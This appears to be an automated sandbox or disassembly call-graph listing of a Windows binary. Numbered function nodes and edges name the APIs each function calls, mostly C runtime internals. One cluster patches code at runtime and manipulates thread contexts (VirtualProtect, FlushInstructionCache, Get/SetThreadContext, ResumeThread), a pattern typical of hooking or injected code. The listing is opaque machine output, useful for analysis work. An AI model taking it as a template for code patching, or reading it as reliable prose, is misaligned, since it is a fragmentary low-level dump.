8952->8951 8953 23d07484412 VirtualFree 8952->8953 8953->8952 8955 23d07484e0c 8954->8955 8956 23d07484e22 VirtualProtect FlushInstructionCache 8955->8956 8957 23d07484e53 8955->8957 8956->8955 8957->8947 9250 23d0748bb71 9251 23d0748c6a8 15 API calls 9250->9251 9252 23d0748bb76 9251->9252 9253 23d0748bbe7 9252->9253 9254 23d0748bb9d GetModuleHandleW 9252->9254 9266 23d0748ba74 9253->9266 9254->9253 9260 23d0748bbaa 9254->9260 9256 23d0748bc23 9257 23d0748bc2a 9256->9257 9270 23d0748bc40 9256->9270 9260->9253 9262 23d0748bc98 GetModuleHandleExW 9260->9262 9263 23d0748bccc __vcrt_InitializeCriticalSectionEx 9262->9263 9264 23d0748bcfa FreeLibrary 9263->9264 9265 23d0748bd01 9263->9265 9264->9265 9265->9253 9267 23d0748ba90 9266->9267 9276 23d0748baac 9267->9276 9269 23d0748ba99 9269->9256 9271 23d0748bc4d 9270->9271 9272 23d0748bc62 9271->9272 9273 23d0748bc51 GetCurrentProcess TerminateProcess 9271->9273 9274 23d0748bc98 2 API calls 9272->9274 9273->9272 9275 23d0748bc69 ExitProcess 9274->9275 9277 23d0748bac2 9276->9277 9278 23d0748bb25 9276->9278 9277->9278 9280 23d0748c48c 9277->9280 9278->9269 9283 23d0748c330 9280->9283 9282 23d0748c4c9 9282->9278 9284 23d0748c34c 9283->9284 9287 23d0748c36c 9284->9287 9286 23d0748c355 9286->9282 9288 23d0748c39a 9287->9288 9289 23d0748c392 9287->9289 9288->9289 9290 23d0748d744 __free_lconv_mon 5 API calls 9288->9290 9289->9286 9290->9289 9291 23d07483774 9294 23d074836c8 9291->9294 9295 23d074836db GetModuleHandleW 9294->9295 9296 23d0748376d FreeLibraryAndExitThread 9294->9296 9297 23d07483759 TerminateThread 9295->9297 9298 23d074836f2 GetCurrentProcess VirtualProtectEx 9295->9298 9301 23d07481e6c 9297->9301 9298->9297 9299 23d0748371e GetCurrentProcess VirtualProtectEx 9298->9299 9299->9297 9328 23d07485ab0 9301->9328 9305 23d07481e88 9306 23d07481ea8 9305->9306 9338 23d07485710 GetCurrentThreadId 9305->9338 9308 23d07481ec8 9306->9308 9309 23d07485710 5 API calls 9306->9309 9310 23d07481ee8 9308->9310 9312 23d07485710 5 API calls 9308->9312 9309->9308 9311 23d07481f08 9310->9311 9313 23d07485710 5 API calls 9310->9313 9314 23d07485710 5 API calls 9311->9314 9316 23d07481f28 9311->9316 9312->9310 9313->9311 9314->9316 9315 23d07481f48 9318 23d07481f68 9315->9318 9319 23d07485710 5 API calls 9315->9319 9316->9315 9317 23d07485710 5 API calls 9316->9317 9317->9315 9320 23d07481f88 9318->9320 9321 23d07485710 5 API calls 9318->9321 9319->9318 9322 23d07481fa8 9320->9322 9323 23d07485710 5 API calls 9320->9323 9321->9320 9324 23d07481fc8 9322->9324 9325 23d07485710 5 API calls 9322->9325 9323->9322 9345 23d07485b30 9324->9345 9325->9324 9327 23d07485b2b 9327->9296 9329 23d07481e7a GetCurrentThread 9328->9329 9330 23d07485ac4 9328->9330 9332 23d07485fd0 9329->9332 9330->9329 9368 23d07485030 9330->9368 9333 23d07485fed 9332->9333 9337 23d07485fe2 9332->9337 9334 23d07487870 2 API calls 9333->9334 9333->9337 9335 23d0748600a 9334->9335 9336 23d0748607d GetLastError 9335->9336 9335->9337 9336->9337 9337->9305 9339 23d0748573d 9338->9339 9341 23d07485733 9338->9341 9340 23d07487870 2 API calls 9339->9340 9339->9341 9342 23d074857b1 type_info::_name_internal_method 9340->9342 9341->9306 9342->9341 9343 23d074858c0 VirtualProtect 9342->9343 9343->9341 9344 23d074858e9 GetLastError 9343->9344 9344->9341 9346 23d07485b59 9345->9346 9347 23d07485b6b GetCurrentThreadId 9345->9347 9346->9347 9348 23d07485b78 9347->9348 9349 23d07485b82 9347->9349 9352 23d07487940 _log10_special 4 API calls 9348->9352 9350 23d07485b8b 9349->9350 9356 23d07485b9b 9349->9356 9373 23d07485960 GetCurrentThreadId 9350->9373 9353 23d07485fbf 9352->9353 9353->9327 9354 23d07485cbc GetThreadContext 9355 23d07485ce2 9354->9355 9361 23d07485e1a 9354->9361 9355->9361 9362 23d07485d09 9355->9362 9356->9354 9356->9361 9357 23d07485efe 9359 23d07485f1e 9357->9359 9363 23d074843e0 VirtualFree 9357->9363 9358 23d07485e41 VirtualProtect FlushInstructionCache 9358->9361 9360 23d07484df0 3 API calls 9359->9360 9367 23d07485f23 9360->9367 9361->9357 9361->9358 9364 23d07485d8d 9362->9364 9365 23d07485d66 SetThreadContext 9362->9365 9363->9359 9364->9327 9365->9364 9366 23d07485f37 ResumeThread 9366->9367 9367->9348 9367->9366 9372 23d07485042 9368->9372 9369 23d07485058 VirtualProtect 9371 23d07485076 GetLastError 9369->9371 9369->9372 9370 23d0748507f 9370->9329 9371->9370 9372->9369 9372->9370 9374 23d07485971 9373->9374 9377 23d0748597b 9373->9377 9374->9348 9375 23d07485a25 9378 23d07484df0 3 API calls 9375->9378 9376 23d07485993 VirtualProtect 9376->9377 9377->9375 9377->9376 9380 23d07485a35 9378->9380 9379 23d07485a49 ResumeThread 9379->9380 9380->9374 9380->9379 7773 23d07489005 7774 23d07489018 __CxxCallCatchBlock _IsNonwritableInCurrentImage __except_validate_context_record 7773->7774 7775 23d07489109 7774->7775 7776 23d074890d4 RtlUnwindEx 7774->7776 7776->7774 9381 23d07490388 9382 23d07490393 9381->9382 9390 23d07492c88 9382->9390 9384 23d07490398 9396 23d07492d3c 9384->9396 9387 23d074903c9 9388 23d0748d744 __free_lconv_mon 5 API calls 9387->9388 9389 23d074903d5 9388->9389 9395 23d07492ca1 9390->9395 9391 23d07492d21 9391->9384 9392 23d07492cec DeleteCriticalSection 9394 23d0748d744 __free_lconv_mon 5 API calls 9392->9394 9394->9395 9395->9391 9395->9392 9400 23d074934fc 9395->9400 9397 23d074903aa DeleteCriticalSection 9396->9397 9398 23d07492d50 9396->9398 9397->9384 9397->9387 9398->9397 9399 23d0748d744 __free_lconv_mon 5 API calls 9398->9399 9399->9397 9401 23d0749352c 9400->9401 9408 23d074933d8 9401->9408 9403 23d07493545 9404 23d0749356a 9403->9404 9405 23d0748c7a0 _invalid_parameter_noinfo 18 API calls 9403->9405 9406 23d0749357f 9404->9406 9407 23d0748c7a0 _invalid_parameter_noinfo 18 API calls 9404->9407 9405->9404 9406->9395 9407->9406 9409 23d07493421 9408->9409 9410 23d074933f3 9408->9410 9412 23d07493413 9409->9412 9414 23d07493454 9409->9414 9411 23d0748d4a4 _invalid_parameter_noinfo 18 API calls 9410->9411 9411->9412 9412->9403 9415 23d0749346f 9414->9415 9416 23d07493494 9414->9416 9417 23d0748d4a4 _invalid_parameter_noinfo 18 API calls 9415->9417 9418 23d0749348f 9416->9418 9428 23d07490100 9416->9428 9417->9418 9418->9412 9421 23d07492d3c 5 API calls 9422 23d074934b1 9421->9422 9434 23d0749064c 9422->9434 9427 23d0748d744 __free_lconv_mon 5 API calls 9427->9418 9429 23d07490126 9428->9429 9430 23d07490157 9428->9430 9429->9430 9431 23d0749064c 18 API calls 9429->9431 9430->9421 9432 23d07490147 9431->9432 9447 23d07492860 9432->9447 9435 23d07490655 9434->9435 9436 23d07490665 9434->9436 9437 23d0748d6ac __free_lconv_mon 5 API calls 9435->9437 9440 23d07493eec 9436->9440 9438 23d0749065a 9437->9438 9439 23d0748d570 _invalid_parameter_noinfo 18 API calls 9438->9439 9439->9436 9442 23d07493f18 9440->9442 9444 23d074934c3 9440->9444 9441 23d07493f7c 9443 23d0748d4a4 _invalid_parameter_noinfo 18 API calls 9441->9443 9442->9441 9445 23d07493f48 9442->9445 9443->9444 9444->9418 9444->9427 9536 23d07493e74 9445->9536 9448 23d07492889 9447->9448 9450 23d074928b6 9447->9450 9448->9430 9449 23d074928cf 9451 23d0748d4a4 _invalid_parameter_noinfo 18 API calls 9449->9451 9450->9449 9452 23d07492926 9450->9452 9451->9448 9452->9448 9454 23d07492980 9452->9454 9455 23d074929ab 9454->9455 9474 23d074929df __vcrt_InitializeCriticalSectionEx 9454->9474 9456 23d074929b0 9455->9456 9458 23d07492a1e 9455->9458 9457 23d0748d4a4 _invalid_parameter_noinfo 18 API calls 9456->9457 9457->9474 9459 23d07492a34 9458->9459 9480 23d07493394 9458->9480 9486 23d07492d80 9459->9486 9462 23d07492b5c 9463 23d07492b6e 9462->9463 9464 23d07492bc0 WriteFile 9462->9464 9465 23d07492b76 9463->9465 9466 23d07492bac 9463->9466 9464->9474 9468 23d07492b98 9465->9468 9469 23d07492b7b 9465->9469 9515 23d074924d0 9466->9515 9467 23d07492a40 9467->9462 9470 23d07492a8f GetConsoleMode 9467->9470 9509 23d074926f0 9468->9509 9469->9474 9503 23d074925d4 9469->9503 9470->9462 9473 23d07492aaa 9470->9473 9476 23d07492b39 9473->9476 9479 23d07492ab6 9473->9479 9474->9448 9494 23d07492058 GetConsoleOutputCP 9476->9494 9478 23d0749339c CreateFileW WriteConsoleW CloseHandle CreateFileW WriteConsoleW 9478->9479 9479->9474 9479->9478 9481 23d074932e8 9480->9481 9521 23d07491ec0 9481->9521 9484 23d07493326 SetFilePointerEx 9485 23d07493315 __vcrt_InitializeCriticalSectionEx 9484->9485 9485->9459 9487 23d07492d96 9486->9487 9488 23d07492d89 9486->9488 9490 23d0748d6ac __free_lconv_mon 5 API calls 9487->9490 9491 23d07492d8e 9487->9491 9489 23d0748d6ac __free_lconv_mon 5 API calls 9488->9489 9489->9491 9492 23d07492dcd 9490->9492 9491->9467 9493 23d0748d570 _invalid_parameter_noinfo 18 API calls 9492->9493 9493->9491 9497 23d074920ec 9494->9497 9495 23d07487940 _log10_special 4 API calls 9496 23d074924b2 9495->9496 9496->9474 9498 23d074904d4 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 9497->9498 9499 23d07492420 __vcrt_InitializeCriticalSectionEx 9497->9499 9500 23d07492388 WriteFile 9497->9500 9501 23d07492e24 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 9497->9501 9502 23d074923c8 WriteFile 9497->9502 9498->9497 9499->9495 9500->9497 9500->9499 9501->9497 9502->9497 9502->9499 9505 23d074925ec 9503->9505 9504 23d07487940 _log10_special 4 API calls 9506 23d074926d5 9504->9506 9507 23d0749267b WriteFile 9505->9507 9508 23d074926b8 __vcrt_InitializeCriticalSectionEx 9505->9508 9506->9474 9507->9505 9507->9508 9508->9504 9512 23d0749270c 9509->9512 9510 23d07487940 _log10_special 4 API calls 9511 23d07492844 9510->9511 9511->9474 9513 23d07492829 __vcrt_InitializeCriticalSectionEx 9512->9513 9514 23d074927e6 WriteFile 9512->9514 9513->9510 9514->9512 9514->9513 9517 23d074924e8 9515->9517 9516 23d07487940 _log10_special 4 API calls 9518 23d074925ba 9516->9518 9519 23d07492566 WriteFile 9517->9519 9520 23d0749259d __vcrt_InitializeCriticalSectionEx 9517->9520 9518->9474 9519->9517 9519->9520 9520->9516 9522 23d07491ec9 9521->9522 9523 23d07491ede 9521->9523 9533 23d0748d68c 9522->9533 9525 23d0748d68c 5 API calls 9523->9525 9530 23d07491ed6 9523->9530 9527 23d07491f19 9525->9527 9529 23d0748d6ac __free_lconv_mon 5 API calls 9527->9529 9528 23d0748d6ac __free_lconv_mon 5 API calls 9528->9530 9531 23d07491f21 9529->9531 9530->9484 9530->9485 9532 23d0748d570 _invalid_parameter_noinfo 18 API calls 9531->9532 9532->9530 9534 23d0748cfa0 __free_lconv_mon 5 API calls 9533->9534 9535 23d0748d695 9534->9535 9535->9528 9537 23d07493e90 9536->9537 9539 23d07493ec5 9537->9539 9540 23d07493fb0 9537->9540 9539->9444 9541 23d07491ec0 18 API calls 9540->9541 9543 23d07493fcc 9541->9543 9542 23d07493fd2 __vcrt_InitializeCriticalSectionEx 9552 23d07491e04 9542->9552 9543->9542 9544 23d0749400f 9543->9544 9546 23d07491ec0 18 API calls 9543->9546 9544->9542 9547 23d07491ec0 18 API calls 9544->9547 9548 23d07494002 9546->9548 9549 23d0749401b CloseHandle 9547->9549 9550 23d07491ec0 18 API calls 9548->9550 9549->9542 9550->9544 9551 23d07494037 9551->9539 9553 23d07491e20 9552->9553 9554 23d07491e92 9552->9554 9553->9554 9560 23d07491e53 9553->9560 9555 23d0748d6ac __free_lconv_mon 5 API calls 9554->9555 9556 23d07491e97 9555->9556 9557 23d0748d68c 5 API calls 9556->9557 9558 23d07491e84 9557->9558 9558->9551 9559 23d07491e7c SetStdHandle 9559->9558 9560->9558 9560->9559 8270 23d0748fa8c 8271 23d0748fa98 8270->8271 8273 23d0748fabf 8271->8273 8274 23d07491cbc 8271->8274 8275 23d07491cfc 8274->8275 8276 23d07491cc1 8274->8276 8275->8271 8277 23d07491ce2 DeleteCriticalSection 8276->8277 8278 23d07491cf4 8276->8278 8277->8277 8277->8278 8279 23d0748d744 __free_lconv_mon 5 API calls 8278->8279 8279->8275 8280 23d0749148c 8281 23d0749149e 8280->8281 8282 23d074914c5 8281->8282 8284 23d074914de 8281->8284 8283 23d0748d6ac __free_lconv_mon 5 API calls 8282->8283 8285 23d074914ca 8283->8285 8286 23d074914d5 8284->8286 8289 23d0748e1b4 8284->8289 8287 23d0748d570 _invalid_parameter_noinfo 18 API calls 8285->8287 8287->8286 8290 23d0748e1d8 8289->8290 8296 23d0748e1d3 8289->8296 8291 23d0748ce28 _invalid_parameter_noinfo 15 API calls 8290->8291 8290->8296 8292 23d0748e1f3 8291->8292 8297 23d074903fc 8292->8297 8296->8286 8298 23d0748e216 8297->8298 8299 23d07490411 8297->8299 8301 23d07490468 8298->8301 8299->8298 8300 23d07490a5c _invalid_parameter_noinfo 15 API calls 8299->8300 8300->8298 8302 23d0749047d 8301->8302 8303 23d07490490 8301->8303 8302->8303 8304 23d0748ecf0 _invalid_parameter_noinfo 15 API calls 8302->8304 8303->8296 8304->8303 9561 23d0748c58c 9562 23d0748c5a5 9561->9562 9563 23d0748c5bd 9561->9563 9562->9563 9564 23d0748d744 __free_lconv_mon 5 API calls 9562->9564 9564->9563 8305 23d0748588c 8306 23d07485893 8305->8306 8307 23d074858c0 VirtualProtect 8306->8307 8309 23d074857d0 8306->8309 8308 23d074858e9 GetLastError 8307->8308 8307->8309 8308->8309 7777 23d07494dfd 7786 23d07489c90 7777->7786 7779 23d07494e4f __CxxCallCatchBlock 7780 23d07489634 _CreateFrameInfo 4 API calls 7779->7780 7781 23d07494e63 7780->7781 7783 23d07489634 _CreateFrameInfo 4 API calls 7781->7783 7784 23d07494e73 7783->7784 7787 23d07489634 _CreateFrameInfo 4 API calls 7786->7787 7788 23d07489ca2 7787->7788 7789 23d07489cdd 7788->7789 7790 23d07489634 _CreateFrameInfo 4 API calls 7788->7790 7791 23d07489cad 7790->7791 7791->7789 7792 23d07489634 _CreateFrameInfo 4 API calls 7791->7792 7793 23d07489cce 7792->7793 7793->7779 7794 23d07489320 7793->7794 7795 23d07489634 _CreateFrameInfo 4 API calls 7794->7795 7796 23d0748932e 7795->7796 7796->7779 8310 23d07494e83 8313 23d07489374 8310->8313 8314 23d0748938c 8313->8314 8315 23d0748939e 8313->8315 8314->8315 8317 23d07489394 8314->8317 8316 23d07489634 _CreateFrameInfo 4 API calls 8315->8316 8319 23d074893a3 8316->8319 8318 23d0748939c 8317->8318 8320 23d07489634 _CreateFrameInfo 4 API calls 8317->8320 8319->8318 8321 23d07489634 _CreateFrameInfo 4 API calls 8319->8321 8322 23d074893c3 8320->8322 8321->8318 8323 23d07489634 _CreateFrameInfo 4 API calls 8322->8323 8324 23d074893d0 8323->8324 8325 23d0748c6a8 15 API calls 8324->8325 8326 23d074893d9 8325->8326 8327 23d0748c6a8 15 API calls 8326->8327 8328 23d074893e5 8327->8328 9565 23d07493d98 9566 23d07493da9 CloseHandle 9565->9566 9567 23d07493daf 9565->9567 9566->9567 8329 23d07494e99 8330 23d07489634 _CreateFrameInfo 4 API calls 8329->8330 8331 23d07494ea7 8330->8331 8332 23d07494eb2 8331->8332 8333 23d07489634 _CreateFrameInfo 4 API calls 8331->8333 8333->8332 8334 23d0748da9c 8335 23d0748dac1 8334->8335 8344 23d0748dad8 8334->8344 8336 23d0748d6ac __free_lconv_mon 5 API calls 8335->8336 8337 23d0748dac6 8336->8337 8339 23d0748d570 _invalid_parameter_noinfo 18 API calls 8337->8339 8338 23d0748db90 8380 23d0748befc 8338->8380 8341 23d0748dad1 8339->8341 8344->8338 8348 23d0748db25 8344->8348 8349 23d0748db68 8344->8349 8364 23d0748dce0 8344->8364 8345 23d0748dbf0 8347 23d0748d744 __free_lconv_mon 5 API calls 8345->8347 8346 23d0748dc81 8351 23d0748d744 __free_lconv_mon 5 API calls 8346->8351 8350 23d0748dbf7 8347->8350 8352 23d0748db48 8348->8352 8356 23d0748d744 __free_lconv_mon 5 API calls 8348->8356 8349->8352 8358 23d0748d744 __free_lconv_mon 5 API calls 8349->8358 8350->8352 8357 23d0748d744 __free_lconv_mon 5 API calls 8350->8357 8354 23d0748dc8c 8351->8354 8355 23d0748d744 __free_lconv_mon 5 API calls 8352->8355 8353 23d0748dc22 8353->8346 8353->8353 8363 23d0748dcc7 8353->8363 8386 23d07490f50 8353->8386 8359 23d0748dca5 8354->8359 8360 23d0748d744 __free_lconv_mon 5 API calls 8354->8360 8355->8341 8356->8348 8357->8350 8358->8349 8361 23d0748d744 __free_lconv_mon 5 API calls 8359->8361 8360->8354 8361->8341 8365 23d0748dd0e 8364->8365 8365->8365 8366 23d0748d6cc __free_lconv_mon 5 API calls 8365->8366 8367 23d0748dd59 8366->8367 8368 23d07490f50 18 API calls 8367->8368 8369 23d0748dd8f 8368->8369 8370 23d0748e1b4 15 API calls 8369->8370 8371 23d0748df46 8370->8371 8395 23d0748d794 8371->8395 8374 23d0748e00d 8375 23d0748e1b4 15 API calls 8374->8375 8376 23d0748e03d 8375->8376 8412 23d0748d910 8376->8412 8379 23d0748dce0 18 API calls 8381 23d0748bf4c 8380->8381 8382 23d0748bf14 8380->8382 8381->8345 8381->8353 8382->8381 8383 23d0748d6cc __free_lconv_mon 5 API calls 8382->8383 8384 23d0748bf42 8383->8384 8385 23d0748d744 __free_lconv_mon 5 API calls 8384->8385 8385->8381 8389 23d07490f6d 8386->8389 8387 23d07490f72 8388 23d0748d6ac __free_lconv_mon 5 API calls 8387->8388 8392 23d07490f88 8387->8392 8394 23d07490f7c 8388->8394 8389->8387 8390 23d07490fbc 8389->8390 8389->8392 8390->8392 8393 23d0748d6ac __free_lconv_mon 5 API calls 8390->8393 8391 23d0748d570 _invalid_parameter_noinfo 18 API calls 8391->8392 8392->8353 8393->8394 8394->8391 8396 23d0748d7be 8395->8396 8397 23d0748d7e2 8395->8397 8399 23d0748d744 __free_lconv_mon 5 API calls 8396->8399 8403 23d0748d7cd FindFirstFileExW 8396->8403 8398 23d0748d7e7 8397->8398 8402 23d0748d83c 8397->8402 8400 23d0748d7fc 8398->8400 8398->8403 8404 23d0748d744 __free_lconv_mon 5 API calls 8398->8404 8399->8403 8429 23d0748ca0c 8400->8429 8405 23d0748d88d 8402->8405 8406 23d0748d744 __free_lconv_mon 5 API calls 8402->8406 8409 23d0748d85f __vcrt_InitializeCriticalSectionEx 8402->8409 8403->8374 8404->8400 8407 23d0748ca0c 5 API calls 8405->8407 8406->8405 8407->8409 8409->8403 8433 23d0748d620 8409->8433 8411 23d0748d6ac __free_lconv_mon 5 API calls 8411->8403 8413 23d0748d93a 8412->8413 8414 23d0748d95e 8412->8414 8416 23d0748d744 __free_lconv_mon 5 API calls 8413->8416 8419 23d0748d949 8413->8419 8415 23d0748d964 8414->8415 8418 23d0748d9b8 8414->8418 8417 23d0748d979 8415->8417 8415->8419 8420 23d0748d744 __free_lconv_mon 5 API calls 8415->8420 8416->8419 8421 23d0748ca0c 5 API calls 8417->8421 8422 23d0748da14 8418->8422 8425 23d0748d744 __free_lconv_mon 5 API calls 8418->8425 8426 23d0748d9e3 __vcrt_InitializeCriticalSectionEx 8418->8426 8419->8379 8420->8417 8421->8419 8423 23d0748ca0c 5 API calls 8422->8423 8423->8426 8424 23d0748d620 5 API calls 8427 23d0748d9f0 8424->8427 8425->8422 8426->8419 8426->8424 8428 23d0748d6ac __free_lconv_mon 5 API calls 8427->8428 8428->8419 8431 23d0748ca1b __free_lconv_mon 8429->8431 8430 23d0748d6ac __free_lconv_mon 5 API calls 8432 23d0748ca55 8430->8432 8431->8430 8431->8432 8432->8403 8434 23d0748cfa0 __free_lconv_mon 5 API calls 8433->8434 8435 23d0748d62d __free_lconv_mon 8434->8435 8436 23d0748cfa0 __free_lconv_mon 5 API calls 8435->8436 8437 23d0748d64f 8436->8437 8437->8411 8958 23d07487b1c 8960 23d07487b40 __scrt_acquire_startup_lock 8958->8960 8959 23d0748b8e5 8960->8959 8961 23d0748cfa0 __free_lconv_mon 5 API calls 8960->8961 8962 23d0748b90e 8961->8962 8963 23d0748b10e 8964 23d07489634 _CreateFrameInfo 4 API calls 8963->8964 8966 23d0748b11b __CxxCallCatchBlock 8964->8966 8965 23d0748b15f RaiseException 8967 23d0748b186 8965->8967 8966->8965 8968 23d07489c90 __CxxCallCatchBlock 4 API calls 8967->8968 8972 23d0748b18e 8968->8972 8969 23d0748b1b7 __CxxCallCatchBlock 8970 23d07489634 _CreateFrameInfo 4 API calls 8969->8970 8971 23d0748b1ca 8970->8971 8973 23d07489634 _CreateFrameInfo 4 API calls 8971->8973 8972->8969 8974 23d07489320 __CxxCallCatchBlock 4 API calls 8972->8974 8975 23d0748b1d3 8973->8975 8974->8969 7797 23d07488010 7800 23d074893e8 7797->7800 7799 23d07488039 7801 23d0748943e __vcrt_freefls 7800->7801 7802 23d07489409 7800->7802 7801->7799 7802->7801 7804 23d0748c6e8 7802->7804 7805 23d0748c6f5 7804->7805 7806 23d0748c6ff 7804->7806 7805->7806 7808 23d0748c71a 7805->7808 7813 23d0748d6ac 7806->7813 7810 23d0748c712 7808->7810 7811 23d0748d6ac __free_lconv_mon 5 API calls 7808->7811 7810->7801 7812 23d0748c706 7811->7812 7816 23d0748d570 7812->7816 7819 23d0748cfa0 7813->7819 7815 23d0748d6b5 7815->7812 7964 23d0748d408 7816->7964 7821 23d0748cfb5 __vcrt_InitializeCriticalSectionEx 7819->7821 7820 23d0748cfe1 FlsSetValue 7822 23d0748cff3 7820->7822 7825 23d0748cfd1 _invalid_parameter_noinfo 7820->7825 7821->7820 7821->7825 7835 23d0748d6cc 7822->7835 7825->7815 7826 23d0748d020 FlsSetValue 7828 23d0748d02c FlsSetValue 7826->7828 7829 23d0748d03e 7826->7829 7827 23d0748d010 FlsSetValue 7830 23d0748d019 7827->7830 7828->7830 7844 23d0748cb94 7829->7844 7839 23d0748d744 7830->7839 7834 23d0748d744 __free_lconv_mon HeapFree 7834->7825 7838 23d0748d6dd __free_lconv_mon 7835->7838 7836 23d0748d6ac __free_lconv_mon 5 API calls 7837 23d0748d002 7836->7837 7837->7826 7837->7827 7838->7836 7838->7837 7840 23d0748d749 HeapFree 7839->7840 7841 23d0748d77a 7839->7841 7840->7841 7842 23d0748d764 __free_lconv_mon __vcrt_InitializeCriticalSectionEx 7840->7842 7841->7825 7843 23d0748d6ac __free_lconv_mon 4 API calls 7842->7843 7843->7841 7845 23d0748cc46 __free_lconv_mon 7844->7845 7848 23d0748caec 7845->7848 7847 23d0748cc5b 7847->7834 7849 23d0748cb08 7848->7849 7852 23d0748cd7c 7849->7852 7851 23d0748cb1e 7851->7847 7853 23d0748cd98 Concurrency::details::SchedulerProxy::DeleteThis 7852->7853 7854 23d0748cdc4 Concurrency::details::SchedulerProxy::DeleteThis 7852->7854 7853->7854 7856 23d074907b4 7853->7856 7854->7851 7857 23d07490850 7856->7857 7861 23d074907d7 7856->7861 7858 23d074908a3 7857->7858 7860 23d0748d744 __free_lconv_mon 5 API calls 7857->7860 7922 23d07490954 7858->7922 7862 23d07490874 7860->7862 7861->7857 7863 23d07490816 7861->7863 7866 23d0748d744 __free_lconv_mon 5 API calls 7861->7866 7864 23d0748d744 __free_lconv_mon 5 API calls 7862->7864 7865 23d07490838 7863->7865 7872 23d0748d744 __free_lconv_mon 5 API calls 7863->7872 7868 23d07490888 7864->7868 7869 23d0748d744 __free_lconv_mon 5 API calls 7865->7869 7870 23d0749080a 7866->7870 7867 23d074908af 7873 23d0749090e 7867->7873 7879 23d0748d744 5 API calls __free_lconv_mon 7867->7879 7871 23d0748d744 __free_lconv_mon 5 API calls 7868->7871 7874 23d07490844 7869->7874 7882 23d07492fc8 7870->7882 7876 23d07490897 7871->7876 7877 23d0749082c 7872->7877 7878 23d0748d744 __free_lconv_mon 5 API calls 7874->7878 7880 23d0748d744 __free_lconv_mon 5 API calls 7876->7880 7910 23d074930d4 7877->7910 7878->7857 7879->7867 7880->7858 7883 23d074930cc 7882->7883 7884 23d07492fd1 7882->7884 7883->7863 7885 23d07492feb 7884->7885 7886 23d0748d744 __free_lconv_mon 5 API calls 7884->7886 7887 23d07492ffd 7885->7887 7888 23d0748d744 __free_lconv_mon 5 API calls 7885->7888 7886->7885 7889 23d0749300f 7887->7889 7890 23d0748d744 __free_lconv_mon 5 API calls 7887->7890 7888->7887 7891 23d07493021 7889->7891 7892 23d0748d744 __free_lconv_mon 5 API calls 7889->7892 7890->7889 7893 23d07493033 7891->7893 7894 23d0748d744 __free_lconv_mon 5 API calls 7891->7894 7892->7891 7895 23d07493045 7893->7895 7897 23d0748d744 __free_lconv_mon 5 API calls 7893->7897 7894->7893 7896 23d07493057 7895->7896 7898 23d0748d744 __free_lconv_mon 5 API calls 7895->7898 7899 23d07493069 7896->7899 7900 23d0748d744 __free_lconv_mon 5 API calls 7896->7900 7897->7895 7898->7896 7901 23d0749307b 7899->7901 7902 23d0748d744 __free_lconv_mon 5 API calls 7899->7902 7900->7899 7903 23d0749308d 7901->7903 7904 23d0748d744 __free_lconv_mon 5 API calls 7901->7904 7902->7901 7905 23d074930a2 7903->7905 7907 23d0748d744 __free_lconv_mon 5 API calls 7903->7907 7904->7903 7906 23d074930b7 7905->7906 7908 23d0748d744 __free_lconv_mon 5 API calls 7905->7908 7906->7883 7909 23d0748d744 __free_lconv_mon 5 API calls 7906->7909 7907->7905 7908->7906 7909->7883 7911 23d074930d9 7910->7911 7920 23d0749313a 7910->7920 7912 23d074930f2 7911->7912 7913 23d0748d744 __free_lconv_mon 5 API calls 7911->7913 7914 23d07493104 7912->7914 7915 23d0748d744 __free_lconv_mon 5 API calls 7912->7915 7913->7912 7916 23d07493116 7914->7916 7917 23d0748d744 __free_lconv_mon 5 API calls 7914->7917 7915->7914 7918 23d07493128 7916->7918 7919 23d0748d744 __free_lconv_mon 5 API calls 7916->7919 7917->7916 7918->7920 7921 23d0748d744 __free_lconv_mon 5 API calls 7918->7921 7919->7918 7920->7865 7921->7920 7923 23d07490985 7922->7923 7924 23d07490959 7922->7924 7923->7867 7924->7923 7928 23d07493174 7924->7928 7927 23d0748d744 __free_lconv_mon 5 API calls 7927->7923 7929 23d0749097d 7928->7929 7930 23d0749317d 7928->7930 7929->7927 7931 23d07493140 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 7930->7931 7932 23d0749319b 7931->7932 7933 23d07493140 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 7932->7933 7934 23d074931a6 7933->7934 7935 23d07493140 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 7934->7935 7936 23d074931b4 7935->7936 7937 23d07493140 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 7936->7937 7938 23d074931c2 7937->7938 7939 23d07493140 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 7938->7939 7940 23d074931d1 7939->7940 7941 23d0748d744 __free_lconv_mon 5 API calls 7940->7941 7942 23d074931dd 7941->7942 7943 23d0748d744 __free_lconv_mon 5 API calls 7942->7943 7944 23d074931e9 7943->7944 7945 23d0748d744 __free_lconv_mon 5 API calls 7944->7945 7946 23d074931f5 7945->7946 7947 23d07493140 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 7946->7947 7948 23d07493203 7947->7948 7949 23d07493140 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 7948->7949 7950 23d07493211 7949->7950 7951 23d07493140 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 7950->7951 7952 23d0749321f 7951->7952 7953 23d07493140 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 7952->7953 7954 23d0749322d 7953->7954 7955 23d07493140 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 7954->7955 7956 23d0749323c 7955->7956 7957 23d0748d744 __free_lconv_mon 5 API calls 7956->7957 7958 23d07493248 7957->7958 7959 23d0748d744 __free_lconv_mon 5 API calls 7958->7959 7960 23d07493254 7959->7960 7961 23d0748d744 __free_lconv_mon 5 API calls 7960->7961 7962 23d07493260 7961->7962 7963 23d0748d744 __free_lconv_mon 5 API calls 7962->7963 7963->7929 7965 23d0748d433 7964->7965 7972 23d0748d4a4 7965->7972 7967 23d0748d45a 7968 23d0748d47d 7967->7968 7978 23d0748c7a0 7967->7978 7970 23d0748d492 7968->7970 7971 23d0748c7a0 _invalid_parameter_noinfo 18 API calls 7968->7971 7970->7810 7971->7970 7989 23d0748d1ec 7972->7989 7974 23d0748d4df 7974->7967 7975 23d0748d4ce _invalid_parameter_noinfo 7975->7974 7976 23d0748d408 _invalid_parameter_noinfo 18 API calls 7975->7976 7977 23d0748d589 7976->7977 7977->7967 7979 23d0748c7f8 7978->7979 7980 23d0748c7af __vcrt_InitializeCriticalSectionEx 7978->7980 7979->7968 7981 23d0748d068 _invalid_parameter_noinfo 8 API calls 7980->7981 7982 23d0748c7de 